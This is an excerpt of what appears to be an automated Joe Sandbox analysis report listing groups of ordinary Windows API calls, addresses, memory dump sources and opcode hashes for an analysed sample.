                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastacceptselect
                                                                                                • String ID:
                                                                                                • API String ID: 385091864-0
                                                                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                • String ID:
                                                                                                • API String ID: 1358664141-0
                                                                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 2880819207-0
                                                                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 357397906-0
                                                                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                APIs
                                                                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • __wsplitpath.LIBCMT ref: 00433950
                                                                                                • __wcsicoll.LIBCMT ref: 00433974
                                                                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                • String ID:
                                                                                                • API String ID: 1187119602-0
                                                                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1597257046-0
                                                                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 237123855-0
                                                                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3349847261-0
                                                                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 2223660684-0
                                                                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                • EndPath.GDI32(?), ref: 00447336
                                                                                                • StrokePath.GDI32(?), ref: 00447344
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                • String ID:
                                                                                                • API String ID: 2783949968-0
                                                                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2710830443-0
                                                                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                • String ID:
                                                                                                • API String ID: 146765662-0
                                                                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2889604237-0
                                                                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                APIs
                                                                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
